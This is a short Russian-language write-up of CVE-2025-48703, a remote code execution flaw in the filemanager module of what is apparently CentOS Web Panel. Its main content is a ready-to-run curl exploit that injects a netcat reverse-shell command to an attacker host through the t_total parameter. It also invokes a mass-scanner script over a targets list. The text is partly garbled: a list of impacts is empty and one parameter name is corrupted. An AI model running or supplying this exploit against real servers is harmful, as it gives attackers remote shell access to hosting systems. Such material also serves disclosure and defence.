
Удалённое выполнение кода в веб-панели CentOS
CVE-2025-48703 — это уязвимость удалённого выполнения кода (RCE) в модуле filemanager панели управления веб-хостингом (например, cPanel). Она возникает из-за небезопасной обработки входных данных в функции acc=changePerm, что позволяет атакующему внедрять и выполнять произвольные системные команды с помощью параметра t_total.
Эта уязвимость позволяет атакующим:
⚠️ Атака может быть выполнена с минимальной аутентификацией или, в некоторых конфигурациях, без аутентификации.
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
--data 'fileName=.bashrc¤tPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'
python3 Scanner.py #Make sure targets.txt is in the same dir
Server: cwpsrv